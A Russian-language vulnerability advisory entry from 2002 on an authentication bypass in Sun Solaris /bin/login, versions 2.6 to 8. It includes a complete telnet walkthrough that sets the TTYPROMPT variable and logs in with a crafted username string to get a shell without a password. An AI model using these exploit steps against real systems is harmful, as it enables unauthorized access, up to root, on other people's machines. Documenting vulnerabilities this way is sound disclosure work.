Дата публикации: | 07.10.2002 |
Всего просмотров: | 1497 |
Опасность: | |
Наличие исправления: | |
Количество уязвимостей: | 1 |
CVE ID: | Нет данных |
Вектор эксплуатации: | |
Воздействие: | |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | |
Описание: | В Sun Solaris обнаружен тривиальный метод обхода идентификации в /bin/login. Уязвимость позволяет удаленному атакующему получить неавторизованный локальный доступ под любым пользователем, в т.ч. и root. Для успешной эксплуатации достаточно определить переменную TTYPROMPT, равную 6 символам, в процессе телнет сессии. Скорее всего проблема связанна с переполнением буфера Пример: coma% telnet telnet> environ define TTYPROMPT abcdef telnet> o localhost SunOS 5.8 bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last login: whenever $ whoami binуязвимость обнаружена в Sun Solaris 2.6-8.0 |
Ссылки: | Solaris 2.6, 7, 8 |